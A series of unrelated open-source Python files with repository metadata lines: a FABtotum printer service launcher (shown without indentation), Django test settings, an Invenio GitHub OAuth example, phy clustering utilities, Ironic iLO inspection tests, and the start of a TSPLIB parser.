from fabtotum.fabui.config import ConfigService
from fabtotum.fabui.bootstrap import hardwareBootstrap
from fabtotum.fabui.monitor import StatsMonitor
from fabtotum.fabui.notify import NotifyService
from fabtotum.totumduino.gcode import GCodeService
from fabtotum.totumduino.hardware import reset as totumduino_reset
from fabtotum.utils.pyro.gcodeserver import GCodeServiceServer
from fabtotum.os.monitor.filesystem import FolderTempMonitor
from fabtotum.os.monitor.usbdrive import UsbMonitor
from fabtotum.os.monitor.gpiomonitor import GPIOMonitor
from fabtotum.os.monitor.configmonitor import ConfigMonitor
def create_file(filename, content=''):
with open(filename,'w') as f:
f.write(content)
os.chmod(filename, 0o660)
# www-data uid/gid are 33/33
os.chown(filename, 33, 33)
def signal_handler(signal, frame):
print "You pressed Ctrl+C!"
logger.debug("Shutting down services. Please wait...")
ws.close()
gcserver.stop()
gcservice.stop()
observer.stop()
gpioMonitor.stop()
statsMonitor.stop()
def shell_exec(cmd):
stdin,stdout = os.popen2(cmd)
stdin.close()
lines = stdout.readlines();
stdout.close()
return lines
# Setup arguments
parser = argparse.ArgumentParser()
parser.add_argument("-B", "--bootstrap", action='store_true', help="Execute bootstrape commands on startup.")
parser.add_argument("-R", "--reset", action='store_true', help="Reset totumduino on startup.")
parser.add_argument("-L", "--log", help="Use logfile to store log messages.", default='<stdout>')
parser.add_argument("-p", "--pidfile", help="File to store process pid.", default=os.path.join(RUN_PATH,'fabtotumservices.pid') )
parser.add_argument("-x", "--xmlrpc_pidfile", help="File to store xmlrpc process pid.", default=os.path.join(RUN_PATH,'xmlrpcserver.pid') )
parser.add_argument("-g", "--gpio_pidfile", help="File to store gpio monitor process pid.", default=os.path.join(RUN_PATH,'gpiomonitor.pid') )
parser.add_argument("-b", "--btagent_pidfile", help="File to store BT agent process pid.", default=os.path.join(RUN_PATH,'btagent.pid') )
parser.add_argument("--no-xmlrpc", help="Don't start XML-RPC service", action='store_true', default=False)
parser.add_argument("--no-gpiomonitor", help="Don't start GPIO monitor service", action='store_true', default=False)
parser.add_argument("--no-btagent", help="Don't start BT agent service", action='store_true', default=False)
parser.add_argument("--no-monitor", help="Don't start Monitor service", action='store_true', default=False)
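# Illustrative invocation (paths are hypothetical, only the flags above are real):
#   python FabtotumServices.py --bootstrap --reset -L /var/log/fabui/services.log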
# Get arguments
args = parser.parse_args()
do_bootstrap = args.bootstrap
do_reset = args.reset
logging_facility = args.log
pidfile = args.pidfile
xmlrpc_pidfile = args.xmlrpc_pidfile
btagent_pidfile = args.btagent_pidfile
no_xmlrpc = args.no_xmlrpc
gpio_pidfile = args.gpio_pidfile
no_gpiomonitor = args.no_gpiomonitor
no_btagent = args.no_btagent
no_monitor = args.no_monitor
#myfabtotumcom_pidfile = args.myfabtotumcom_pidfile
with open(pidfile, 'w') as f:
f.write( str(os.getpid()) )
config = ConfigService()
# Load configuration
TRACE = config.get('general', 'trace')
TASK_MONITOR = config.get('general', 'task_monitor')
TEMP_MONITOR_FILE = config.get('general', 'temperature')
NOTIFY_FILE = config.get('general', 'notify_file')
LOG_LEVEL = config.get('general', 'log_level', 'INFO')
##################################################################
SOCKET_HOST = config.get('socket', 'host')
SOCKET_PORT = config.get('socket', 'port')
##################################################################
HW_DEFAULT_SETTINGS = config.get('hardware', 'settings')
##################################################################
USB_DISK_FOLDER = config.get('usb', 'usb_disk_folder')
USB_FILE = config.get('usb', 'usb_file')
##################################################################
SERIAL_PORT = config.get('serial', 'PORT')
SERIAL_BAUD = config.get('serial', 'BAUD')
##################################################################
FABID_ACTIVE = int(config.get('my.fabtotum.com', 'fabid_active', 0)) == 1
# Prepare files with correct permissions
create_file(TRACE)
create_file(TASK_MONITOR, '{"task":{"status":"terminated"}}')
create_file(TEMP_MONITOR_FILE, '{}')
create_file(NOTIFY_FILE, '{}')
# Setup logger
if LOG_LEVEL == 'INFO':
LOG_LEVEL = logging.INFO
elif LOG_LEVEL == 'DEBUG':
LOG_LEVEL = logging.DEBUG
logger = logging.getLogger('FabtotumService')
logger.setLevel(LOG_LEVEL)
if logging_facility == '<stdout>':
ch = logging.StreamHandler()
elif logging_facility == '<syslog>':
# Not supported at this point
ch = logging.StreamHandler()
else:
ch = logging.FileHandler(logging_facility)
#~ formatter = logging.Formatter("%(name)s - %(levelname)s : %(message)s")
formatter = logging.Formatter("[%(asctime)s]: %(message)s")
ch.setFormatter(formatter)
ch.setLevel(LOG_LEVEL)
logger.addHandler(ch)
if do_reset:
totumduino_reset()
time.sleep(1)
# Clear unfinished tasks
from fabtotum.database import Database
from fabtotum.database.task import Task
now = datetime.now().strftime('%Y-%m-%d %H:%M:%S')
db = Database()
conn = db.get_connection()
cursor = conn.execute("UPDATE sys_tasks SET status='terminated', finish_date='{0}' where status!='completed' and status!='aborted' and status!='terminated'".format(now))
conn.commit()
conn.close()
#myFabototumCom = MyFabtotumCom(gcservice, config, logger)
# Start gcode service
gcservice = GCodeService(SERIAL_PORT, SERIAL_BAUD, logger=logger, fabid=FABID_ACTIVE)
gcservice.start()
# Pyro GCodeService wrapper
gcserver = GCodeServiceServer(gcservice)
ws = WebSocketClient('ws://'+SOCKET_HOST +':'+SOCKET_PORT+'/')
ws.connect();
# Notification service
ns = NotifyService(ws, NOTIFY_FILE, config)
## Folder temp monitor
ftm = FolderTempMonitor(ns, gcservice, logger, TRACE, TASK_MONITOR)
## usb disk monitor
um = UsbMonitor(ns, logger, USB_FILE)
## Configuration monitor
cm = ConfigMonitor(gcservice, config, logger)
## The Observer ;)
observer = Observer()
observer.schedule(um, '/dev/', recursive=False)
observer.schedule(cm, '/var/lib/fabui', recursive=True)
observer.schedule(ftm, TEMP_PATH, recursive=False)
observer.start()
if do_bootstrap:
time.sleep(1)
hardwareBootstrap(gcservice, config, logger=logger)
## Safety monitor
if not no_gpiomonitor:
gpiomon_exe = os.path.join(PYTHON_PATH, 'fabtotum/os/monitor/gpiomonitor.py')
os.system('python {0} -p {1} -L /var/log/fabui/gpiomonitor.log &'.format(gpiomon_exe, gpio_pidfile) )
## Bluetooth agent
if not no_btagent:
btagent_exe = os.path.join(PYTHON_PATH, 'fabtotum/bluetooth/agent.py')
os.system('python {0} -p {1} -L /var/log/fabui/btagent.log &'.format(btagent_exe, btagent_pidfile) )
## Stats monitor
if not no_monitor:
statsMonitor = StatsMonitor(TEMP_MONITOR_FILE, gcservice, config, logger=logger)
statsMonitor.start()
# Ensure CTRL+C detection to gracefully stop the server.
signal.signal(signal.SIGINT, signal_handler)
# Start XMLRPC server
soc_id = shell_exec('</proc/cpuinfo grep Hardware | awk \'{print $3}\'')[0].strip()
rpc = None
if not no_xmlrpc:
if soc_id == 'BCM2709':
xmlrpc_exe = os.path.join(PYTHON_PATH, 'fabtotum/utils/xmlrpc/xmlrpcserver.py')
os.system('python {0} -p {1} -L /var/log/fabui/xmlrpc.log &'.format(xmlrpc_exe, xmlrpc_pidfile) )
#myfabtotumcom_exe = os.path.join(PYTHON_PATH, 'MyFabtotumCom.py')
#os.system('python {0} -p {1} -L /var/log/fabui/myfabtotumcom.log &'.format(myfabtotumcom_exe, myfabtotumcom_pidfile))
else:
from fabtotum.utils.xmlrpc.xmlrpcserver import create as rpc_create
rpc = rpc_create(gcservice, config, logging_facility, logger)
rpc.start()
# Wait for all threads to finish
gcserver.loop()
gcservice.loop()
if not no_monitor:
statsMonitor.loop()
observer.join()
#usbMonitor.join()
#gpioMonitor.join()
if rpc:
rpc.loop()
| FABtotum/colibri-fabui | fabui/ext/py/FabtotumServices.py | Python | gpl-2.0 | 9,501 |
from settings.base import *
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, '..', 'test.sqlite3'),
}
}
EMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'
STATICFILES_STORAGE = 'django.contrib.staticfiles.storage.StaticFilesStorage'
ELVANTO_PEOPLE_PAGE_SIZE = 10
| monty5811/elvanto_subgroups | settings/test.py | Python | mit | 354 |
# -*- coding: utf-8 -*-
#
# This file is part of Invenio.
# Copyright (C) 2015-2018 CERN.
#
# Invenio is free software; you can redistribute it and/or modify it
# under the terms of the MIT License; see LICENSE file for more details.
r"""Minimal Flask application example for development with github handler.
SPHINX-START
1. Register a github application with `Authorization callback URL` as
`http://localhost:5000/oauth/authorized/github/`
2. Ensure you have ``github3.py`` package installed:
.. code-block:: console
$ cdvirtualenv src/invenio-oauthclient
$ pip install -e .[github]
3. Grab the *Client ID* and *Client Secret* after registering the application
and add them to your instance configuration as `consumer_key` and
`consumer_secret`.
.. code-block:: console
$ export GITHUB_APP_CREDENTIALS_KEY=my_github_client_id
$ export GITHUB_APP_CREDENTIALS_SECRET=my_github_client_secret
4. Create database and tables:
.. code-block:: console
$ pip install -e .[all]
$ cd examples
$ export FLASK_APP=github_app.py
$ ./app-setup.py
You can find the database in `examples/github_app.db`.
5. Run the development server:
.. code-block:: console
$ flask run -p 5000 -h '0.0.0.0'
6. Open in a browser the page `http://0.0.0.0:5000/github`.
You will be redirected to github to authorize the application.
Click on `Authorize application` and you will be redirected back to
`http://localhost:5000/oauth/signup/github/`, where you will be able to
   finalize the local user registration by inserting an email address.
   Insert e.g. `fuu@bar.it` as the email address and send the form.
   Now you will be back on the homepage, but this time it says: `hello fuu@bar.it`.
You have completed the user registration.
7. To be able to uninstall the example app:
.. code-block:: console
$ ./app-teardown.sh
SPHINX-END
"""
from __future__ import absolute_import, print_function
import os
from flask import Flask, redirect, url_for
from flask_babelex import Babel
from flask_login import current_user
from flask_menu import Menu as FlaskMenu
from flask_oauthlib.client import OAuth as FlaskOAuth
from invenio_accounts import InvenioAccounts
from invenio_accounts.views import blueprint as blueprint_user
from invenio_db import InvenioDB
from invenio_mail import InvenioMail
from invenio_userprofiles import InvenioUserProfiles
from invenio_userprofiles.views import \
blueprint_ui_init as blueprint_userprofile_init
from invenio_oauthclient import InvenioOAuthClient
from invenio_oauthclient.contrib import github
from invenio_oauthclient.views.client import blueprint as blueprint_client
from invenio_oauthclient.views.settings import blueprint as blueprint_settings
# [ Configure application credentials ]
GITHUB_APP_CREDENTIALS = dict(
consumer_key=os.environ.get('GITHUB_APP_CREDENTIALS_KEY'),
consumer_secret=os.environ.get('GITHUB_APP_CREDENTIALS_SECRET'),
)
# Create Flask application
app = Flask(__name__)
app.config.update(
SQLALCHEMY_DATABASE_URI=os.environ.get(
'SQLALCHEMY_DATABASE_URI', 'sqlite:///github_app.db'
),
OAUTHCLIENT_REMOTE_APPS=dict(
github=github.REMOTE_APP,
),
GITHUB_APP_CREDENTIALS=GITHUB_APP_CREDENTIALS,
DEBUG=True,
SECRET_KEY='TEST',
SQLALCHEMY_ECHO=False,
SECURITY_PASSWORD_SALT='security-password-salt',
MAIL_SUPPRESS_SEND=True,
TESTING=True,
USERPROFILES_EXTEND_SECURITY_FORMS=True,
)
Babel(app)
FlaskMenu(app)
InvenioDB(app)
InvenioAccounts(app)
InvenioUserProfiles(app)
FlaskOAuth(app)
InvenioOAuthClient(app)
InvenioMail(app)
app.register_blueprint(blueprint_user)
app.register_blueprint(blueprint_client)
app.register_blueprint(blueprint_settings)
app.register_blueprint(blueprint_userprofile_init)
@app.route('/')
def index():
"""Homepage."""
return 'Home page (without any restrictions)'
@app.route('/github')
def github():
"""Try to print user email or redirect to login with github."""
if not current_user.is_authenticated:
return redirect(url_for('invenio_oauthclient.login',
remote_app='github'))
return 'hello {}'.format(current_user.email)
| tiborsimko/invenio-oauthclient | examples/github_app.py | Python | mit | 4,239 |
# -*- coding: utf-8 -*-
"""Clustering utility functions."""
#------------------------------------------------------------------------------
# Imports
#------------------------------------------------------------------------------
from copy import deepcopy
from ._history import History
from ...utils import Bunch, _as_list
#------------------------------------------------------------------------------
# Utility functions
#------------------------------------------------------------------------------
def _update_cluster_selection(clusters, up):
clusters = list(clusters)
# Remove deleted clusters.
clusters = [clu for clu in clusters if clu not in up.deleted]
# Add new clusters at the end of the selection.
return clusters + [clu for clu in up.added if clu not in clusters]
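# Small worked example (values invented for illustration): with clusters=[2, 3, 5],
# up.deleted=[3] and up.added=[7], the function returns [2, 5, 7] - deleted clusters
# are dropped and newly added ones are appended at the end of the selection.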
def _join(clusters):
return '[{}]'.format(', '.join(map(str, clusters)))
#------------------------------------------------------------------------------
# UpdateInfo class
#------------------------------------------------------------------------------
class UpdateInfo(Bunch):
"""Hold information about clustering changes."""
def __init__(self, **kwargs):
d = dict(
description='', # information about the update: 'merge', 'assign',
# or 'metadata_<name>'
history=None, # None, 'undo', or 'redo'
spike_ids=[], # all spikes affected by the update
added=[], # new clusters
deleted=[], # deleted clusters
descendants=[], # pairs of (old_cluster, new_cluster)
metadata_changed=[], # clusters with changed metadata
metadata_value=None, # new metadata value
old_spikes_per_cluster={}, # only for the affected clusters
new_spikes_per_cluster={}, # only for the affected clusters
selection=[], # clusters selected before the action
)
d.update(kwargs)
super(UpdateInfo, self).__init__(d)
def __repr__(self):
desc = self.description
h = ' ({})'.format(self.history) if self.history else ''
if not desc:
return '<UpdateInfo>'
elif desc in ('merge', 'assign'):
a, d = _join(self.added), _join(self.deleted)
return '<{desc}{h} {d} => {a}>'.format(desc=desc,
a=a,
d=d,
h=h,
)
elif desc.startswith('metadata'):
c = _join(self.metadata_changed)
m = self.metadata_value
return '<{desc}{h} {c} => {m}>'.format(desc=desc,
c=c,
m=m,
h=h,
)
return '<UpdateInfo>'
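# Illustrative usage (values invented): UpdateInfo(description='merge', added=[10],
# deleted=[2, 3]) is rendered by __repr__ above as "<merge [2, 3] => [10]>".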
#------------------------------------------------------------------------------
# ClusterMetadataUpdater class
#------------------------------------------------------------------------------
class ClusterMetadataUpdater(object):
"""Handle cluster metadata changes."""
def __init__(self, cluster_metadata):
self._cluster_metadata = cluster_metadata
# Keep a deep copy of the original structure for the undo stack.
self._data_base = deepcopy(cluster_metadata.data)
# The stack contains (clusters, field, value, update_info) tuples.
self._undo_stack = History((None, None, None, None))
for field, func in self._cluster_metadata._fields.items():
# Create self.<field>(clusters).
def _make_get(field):
def f(clusters):
return self._cluster_metadata._get(clusters, field)
return f
setattr(self, field, _make_get(field))
# Create self.set_<field>(clusters, value).
def _make_set(field):
def f(clusters, value):
return self._set(clusters, field, value)
return f
setattr(self, 'set_{0:s}'.format(field), _make_set(field))
def _set(self, clusters, field, value, add_to_stack=True):
self._cluster_metadata._set(clusters, field, value)
clusters = _as_list(clusters)
info = UpdateInfo(description='metadata_' + field,
metadata_changed=clusters,
metadata_value=value,
)
if add_to_stack:
self._undo_stack.add((clusters, field, value, info))
return info
def undo(self):
"""Undo the last metadata change.
Returns
-------
up : UpdateInfo instance
"""
args = self._undo_stack.back()
if args is None:
return
self._cluster_metadata._data = deepcopy(self._data_base)
for clusters, field, value, _ in self._undo_stack:
if clusters is not None:
self._set(clusters, field, value, add_to_stack=False)
# Return the UpdateInfo instance of the undo action.
info = args[-1]
info.history = 'undo'
return info
def redo(self):
"""Redo the next metadata change.
Returns
-------
up : UpdateInfo instance
"""
args = self._undo_stack.forward()
if args is None:
return
clusters, field, value, info = args
self._set(clusters, field, value, add_to_stack=False)
# Return the UpdateInfo instance of the redo action.
info.history = 'redo'
return info
| nsteinme/phy | phy/cluster/manual/_utils.py | Python | bsd-3-clause | 5,749 |
# Copyright 2014 Hewlett-Packard Development Company, L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Test class for Management Interface used by iLO modules."""
import mock
from oslo_config import cfg
from ironic.common import exception
from ironic.common import states
from ironic.common import utils
from ironic.conductor import task_manager
from ironic.conductor import utils as conductor_utils
from ironic.db import api as dbapi
from ironic.drivers.modules.ilo import common as ilo_common
from ironic.drivers.modules.ilo import inspect as ilo_inspect
from ironic.drivers.modules.ilo import power as ilo_power
from ironic.tests.conductor import utils as mgr_utils
from ironic.tests.db import base as db_base
from ironic.tests.db import utils as db_utils
from ironic.tests.objects import utils as obj_utils
INFO_DICT = db_utils.get_test_ilo_info()
CONF = cfg.CONF
class IloInspectTestCase(db_base.DbTestCase):
def setUp(self):
super(IloInspectTestCase, self).setUp()
mgr_utils.mock_the_extension_manager(driver="fake_ilo")
self.node = obj_utils.create_test_node(
self.context, driver='fake_ilo', driver_info=INFO_DICT)
def test_get_properties(self):
with task_manager.acquire(self.context, self.node.uuid,
shared=False) as task:
properties = ilo_common.REQUIRED_PROPERTIES.copy()
self.assertEqual(properties,
task.driver.inspect.get_properties())
@mock.patch.object(ilo_common, 'parse_driver_info', spec_set=True,
autospec=True)
def test_validate(self, driver_info_mock):
with task_manager.acquire(self.context, self.node.uuid,
shared=False) as task:
task.driver.inspect.validate(task)
driver_info_mock.assert_called_once_with(task.node)
@mock.patch.object(ilo_inspect, '_get_capabilities', spec_set=True,
autospec=True)
@mock.patch.object(ilo_inspect, '_create_ports_if_not_exist',
spec_set=True, autospec=True)
@mock.patch.object(ilo_inspect, '_get_essential_properties', spec_set=True,
autospec=True)
@mock.patch.object(ilo_power.IloPower, 'get_power_state', spec_set=True,
autospec=True)
@mock.patch.object(ilo_common, 'get_ilo_object', spec_set=True,
autospec=True)
def test_inspect_essential_ok(self, get_ilo_object_mock,
power_mock,
get_essential_mock,
create_port_mock,
get_capabilities_mock):
ilo_object_mock = get_ilo_object_mock.return_value
properties = {'memory_mb': '512', 'local_gb': '10',
'cpus': '1', 'cpu_arch': 'x86_64'}
macs = {'Port 1': 'aa:aa:aa:aa:aa:aa', 'Port 2': 'bb:bb:bb:bb:bb:bb'}
capabilities = ''
result = {'properties': properties, 'macs': macs}
get_essential_mock.return_value = result
get_capabilities_mock.return_value = capabilities
power_mock.return_value = states.POWER_ON
with task_manager.acquire(self.context, self.node.uuid,
shared=False) as task:
task.driver.inspect.inspect_hardware(task)
self.assertEqual(properties, task.node.properties)
power_mock.assert_called_once_with(mock.ANY, task)
get_essential_mock.assert_called_once_with(task.node,
ilo_object_mock)
get_capabilities_mock.assert_called_once_with(task.node,
ilo_object_mock)
create_port_mock.assert_called_once_with(task.node, macs)
@mock.patch.object(ilo_inspect, '_get_capabilities', spec_set=True,
autospec=True)
@mock.patch.object(ilo_inspect, '_create_ports_if_not_exist',
spec_set=True, autospec=True)
@mock.patch.object(ilo_inspect, '_get_essential_properties', spec_set=True,
autospec=True)
@mock.patch.object(conductor_utils, 'node_power_action', spec_set=True,
autospec=True)
@mock.patch.object(ilo_power.IloPower, 'get_power_state', spec_set=True,
autospec=True)
@mock.patch.object(ilo_common, 'get_ilo_object', spec_set=True,
autospec=True)
def test_inspect_essential_ok_power_off(self, get_ilo_object_mock,
power_mock,
set_power_mock,
get_essential_mock,
create_port_mock,
get_capabilities_mock):
ilo_object_mock = get_ilo_object_mock.return_value
properties = {'memory_mb': '512', 'local_gb': '10',
'cpus': '1', 'cpu_arch': 'x86_64'}
macs = {'Port 1': 'aa:aa:aa:aa:aa:aa', 'Port 2': 'bb:bb:bb:bb:bb:bb'}
capabilities = ''
result = {'properties': properties, 'macs': macs}
get_essential_mock.return_value = result
get_capabilities_mock.return_value = capabilities
power_mock.return_value = states.POWER_OFF
with task_manager.acquire(self.context, self.node.uuid,
shared=False) as task:
task.driver.inspect.inspect_hardware(task)
self.assertEqual(properties, task.node.properties)
power_mock.assert_called_once_with(mock.ANY, task)
set_power_mock.assert_any_call(task, states.POWER_ON)
get_essential_mock.assert_called_once_with(task.node,
ilo_object_mock)
get_capabilities_mock.assert_called_once_with(task.node,
ilo_object_mock)
create_port_mock.assert_called_once_with(task.node, macs)
@mock.patch.object(ilo_inspect, '_get_capabilities', spec_set=True,
autospec=True)
@mock.patch.object(ilo_inspect, '_create_ports_if_not_exist',
spec_set=True, autospec=True)
@mock.patch.object(ilo_inspect, '_get_essential_properties', spec_set=True,
autospec=True)
@mock.patch.object(ilo_power.IloPower, 'get_power_state', spec_set=True,
autospec=True)
@mock.patch.object(ilo_common, 'get_ilo_object', spec_set=True,
autospec=True)
def test_inspect_essential_capabilities_ok(self, get_ilo_object_mock,
power_mock,
get_essential_mock,
create_port_mock,
get_capabilities_mock):
ilo_object_mock = get_ilo_object_mock.return_value
properties = {'memory_mb': '512', 'local_gb': '10',
'cpus': '1', 'cpu_arch': 'x86_64'}
macs = {'Port 1': 'aa:aa:aa:aa:aa:aa', 'Port 2': 'bb:bb:bb:bb:bb:bb'}
capability_str = 'BootMode:uefi'
capabilities = {'BootMode': 'uefi'}
result = {'properties': properties, 'macs': macs}
get_essential_mock.return_value = result
get_capabilities_mock.return_value = capabilities
power_mock.return_value = states.POWER_ON
with task_manager.acquire(self.context, self.node.uuid,
shared=False) as task:
task.driver.inspect.inspect_hardware(task)
expected_properties = {'memory_mb': '512', 'local_gb': '10',
'cpus': '1', 'cpu_arch': 'x86_64',
'capabilities': capability_str}
self.assertEqual(expected_properties, task.node.properties)
power_mock.assert_called_once_with(mock.ANY, task)
get_essential_mock.assert_called_once_with(task.node,
ilo_object_mock)
get_capabilities_mock.assert_called_once_with(task.node,
ilo_object_mock)
create_port_mock.assert_called_once_with(task.node, macs)
@mock.patch.object(ilo_inspect, '_get_capabilities', spec_set=True,
autospec=True)
@mock.patch.object(ilo_inspect, '_create_ports_if_not_exist',
spec_set=True, autospec=True)
@mock.patch.object(ilo_inspect, '_get_essential_properties', spec_set=True,
autospec=True)
@mock.patch.object(ilo_power.IloPower, 'get_power_state', spec_set=True,
autospec=True)
@mock.patch.object(ilo_common, 'get_ilo_object', spec_set=True,
autospec=True)
def test_inspect_essential_capabilities_exist_ok(self, get_ilo_object_mock,
power_mock,
get_essential_mock,
create_port_mock,
get_capabilities_mock):
ilo_object_mock = get_ilo_object_mock.return_value
properties = {'memory_mb': '512', 'local_gb': '10',
'cpus': '1', 'cpu_arch': 'x86_64',
'somekey': 'somevalue'}
macs = {'Port 1': 'aa:aa:aa:aa:aa:aa', 'Port 2': 'bb:bb:bb:bb:bb:bb'}
result = {'properties': properties, 'macs': macs}
capabilities = {'BootMode': 'uefi'}
get_essential_mock.return_value = result
get_capabilities_mock.return_value = capabilities
power_mock.return_value = states.POWER_ON
with task_manager.acquire(self.context, self.node.uuid,
shared=False) as task:
task.node.properties = {'capabilities': 'foo:bar'}
expected_capabilities = ('BootMode:uefi,'
'foo:bar')
set1 = set(expected_capabilities.split(','))
task.driver.inspect.inspect_hardware(task)
end_capabilities = task.node.properties['capabilities']
set2 = set(end_capabilities.split(','))
self.assertEqual(set1, set2)
expected_properties = {'memory_mb': '512', 'local_gb': '10',
'cpus': '1', 'cpu_arch': 'x86_64',
'capabilities': end_capabilities}
power_mock.assert_called_once_with(mock.ANY, task)
self.assertEqual(task.node.properties, expected_properties)
get_essential_mock.assert_called_once_with(task.node,
ilo_object_mock)
get_capabilities_mock.assert_called_once_with(task.node,
ilo_object_mock)
create_port_mock.assert_called_once_with(task.node, macs)
class TestInspectPrivateMethods(db_base.DbTestCase):
def setUp(self):
super(TestInspectPrivateMethods, self).setUp()
mgr_utils.mock_the_extension_manager(driver="fake_ilo")
self.node = obj_utils.create_test_node(
self.context, driver='fake_ilo', driver_info=INFO_DICT)
@mock.patch.object(ilo_inspect.LOG, 'info', spec_set=True, autospec=True)
@mock.patch.object(dbapi, 'get_instance', spec_set=True, autospec=True)
def test__create_ports_if_not_exist(self, instance_mock, log_mock):
db_obj = instance_mock.return_value
macs = {'Port 1': 'aa:aa:aa:aa:aa:aa', 'Port 2': 'bb:bb:bb:bb:bb:bb'}
node_id = self.node.id
port_dict1 = {'address': 'aa:aa:aa:aa:aa:aa', 'node_id': node_id}
port_dict2 = {'address': 'bb:bb:bb:bb:bb:bb', 'node_id': node_id}
ilo_inspect._create_ports_if_not_exist(self.node, macs)
instance_mock.assert_called_once_with()
self.assertTrue(log_mock.called)
db_obj.create_port.assert_any_call(port_dict1)
db_obj.create_port.assert_any_call(port_dict2)
@mock.patch.object(ilo_inspect.LOG, 'warn', spec_set=True, autospec=True)
@mock.patch.object(dbapi, 'get_instance', spec_set=True, autospec=True)
def test__create_ports_if_not_exist_mac_exception(self,
instance_mock,
log_mock):
dbapi_mock = instance_mock.return_value
dbapi_mock.create_port.side_effect = exception.MACAlreadyExists('f')
macs = {'Port 1': 'aa:aa:aa:aa:aa:aa', 'Port 2': 'bb:bb:bb:bb:bb:bb'}
ilo_inspect._create_ports_if_not_exist(self.node, macs)
instance_mock.assert_called_once_with()
self.assertTrue(log_mock.called)
def test__get_essential_properties_ok(self):
ilo_mock = mock.MagicMock(spec=['get_essential_properties'])
properties = {'memory_mb': '512', 'local_gb': '10',
'cpus': '1', 'cpu_arch': 'x86_64'}
macs = {'Port 1': 'aa:aa:aa:aa:aa:aa', 'Port 2': 'bb:bb:bb:bb:bb:bb'}
result = {'properties': properties, 'macs': macs}
ilo_mock.get_essential_properties.return_value = result
actual_result = ilo_inspect._get_essential_properties(self.node,
ilo_mock)
self.assertEqual(result, actual_result)
def test__get_essential_properties_fail(self):
ilo_mock = mock.MagicMock(
spec=['get_additional_capabilities', 'get_essential_properties'])
# Missing key: cpu_arch
properties = {'memory_mb': '512', 'local_gb': '10',
'cpus': '1'}
macs = {'Port 1': 'aa:aa:aa:aa:aa:aa', 'Port 2': 'bb:bb:bb:bb:bb:bb'}
result = {'properties': properties, 'macs': macs}
ilo_mock.get_essential_properties.return_value = result
result = self.assertRaises(exception.HardwareInspectionFailure,
ilo_inspect._get_essential_properties,
self.node,
ilo_mock)
self.assertEqual(
result.format_message(),
("Failed to inspect hardware. Reason: Server didn't return the "
"key(s): cpu_arch"))
def test__get_essential_properties_fail_invalid_format(self):
ilo_mock = mock.MagicMock(
spec=['get_additional_capabilities', 'get_essential_properties'])
# Not a dict
properties = ['memory_mb', '512', 'local_gb', '10',
'cpus', '1']
macs = ['aa:aa:aa:aa:aa:aa', 'bb:bb:bb:bb:bb:bb']
capabilities = ''
result = {'properties': properties, 'macs': macs}
ilo_mock.get_essential_properties.return_value = result
ilo_mock.get_additional_capabilities.return_value = capabilities
self.assertRaises(exception.HardwareInspectionFailure,
ilo_inspect._get_essential_properties,
self.node, ilo_mock)
def test__get_essential_properties_fail_mac_invalid_format(self):
ilo_mock = mock.MagicMock(spec=['get_essential_properties'])
properties = {'memory_mb': '512', 'local_gb': '10',
'cpus': '1', 'cpu_arch': 'x86_64'}
# Not a dict
macs = 'aa:aa:aa:aa:aa:aa'
result = {'properties': properties, 'macs': macs}
ilo_mock.get_essential_properties.return_value = result
self.assertRaises(exception.HardwareInspectionFailure,
ilo_inspect._get_essential_properties,
self.node, ilo_mock)
def test__get_essential_properties_hardware_port_empty(self):
ilo_mock = mock.MagicMock(
spec=['get_additional_capabilities', 'get_essential_properties'])
properties = {'memory_mb': '512', 'local_gb': '10',
'cpus': '1', 'cpu_arch': 'x86_64'}
# Not a dictionary
macs = None
result = {'properties': properties, 'macs': macs}
capabilities = ''
ilo_mock.get_essential_properties.return_value = result
ilo_mock.get_additional_capabilities.return_value = capabilities
self.assertRaises(exception.HardwareInspectionFailure,
ilo_inspect._get_essential_properties,
self.node, ilo_mock)
def test__get_essential_properties_hardware_port_not_dict(self):
ilo_mock = mock.MagicMock(spec=['get_essential_properties'])
properties = {'memory_mb': '512', 'local_gb': '10',
'cpus': '1', 'cpu_arch': 'x86_64'}
# Not a dict
macs = 'aa:bb:cc:dd:ee:ff'
result = {'properties': properties, 'macs': macs}
ilo_mock.get_essential_properties.return_value = result
result = self.assertRaises(
exception.HardwareInspectionFailure,
ilo_inspect._get_essential_properties, self.node, ilo_mock)
@mock.patch.object(utils, 'get_updated_capabilities', spec_set=True,
autospec=True)
def test__get_capabilities_ok(self, capability_mock):
ilo_mock = mock.MagicMock(spec=['get_server_capabilities'])
capabilities = {'ilo_firmware_version': 'xyz'}
ilo_mock.get_server_capabilities.return_value = capabilities
cap = ilo_inspect._get_capabilities(self.node, ilo_mock)
self.assertEqual(cap, capabilities)
def test__validate_ok(self):
properties = {'memory_mb': '512', 'local_gb': '10',
'cpus': '2', 'cpu_arch': 'x86_arch'}
macs = {'Port 1': 'aa:aa:aa:aa:aa:aa'}
data = {'properties': properties, 'macs': macs}
valid_keys = set(ilo_inspect.ESSENTIAL_PROPERTIES_KEYS)
ilo_inspect._validate(self.node, data)
self.assertEqual(sorted(set(properties)), sorted(valid_keys))
def test__validate_essential_keys_fail_missing_key(self):
properties = {'memory_mb': '512', 'local_gb': '10',
'cpus': '1'}
macs = {'Port 1': 'aa:aa:aa:aa:aa:aa'}
data = {'properties': properties, 'macs': macs}
self.assertRaises(exception.HardwareInspectionFailure,
ilo_inspect._validate, self.node, data)
| Tan0/ironic | ironic/tests/drivers/ilo/test_inspect.py | Python | apache-2.0 | 19,077 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
import sys
from utils.benchmark import get_value, get_matrix, parse_node_coords
# Generate a json-formatted problem from a tsplib file.
TSP_FIELDS = ["NAME", "TYPE", "COMMENT", "DIMENSION", "EDGE_WEIGHT_TYPE"]
def parse_tsp(input_file):
with open(input_file, "r") as f:
lines = f.readlines()
# Remember main fields describing the problem type.
meta = {}
for s in TSP_FIELDS:
data = get_value(s, lines)
if data:
meta[s] = data
# Only support EUC_2D for now.
if ("EDGE_WEIGHT_TYPE" not in meta) or (meta["EDGE_WEIGHT_TYPE"] != "EUC_2D"):
        print(" - Unsupported EDGE_WEIGHT_TYPE: " + meta.get("EDGE_WEIGHT_TYPE", "<missing>") + ".")
exit(0)
meta["DIMENSION"] = int(meta["DIMENSION"])
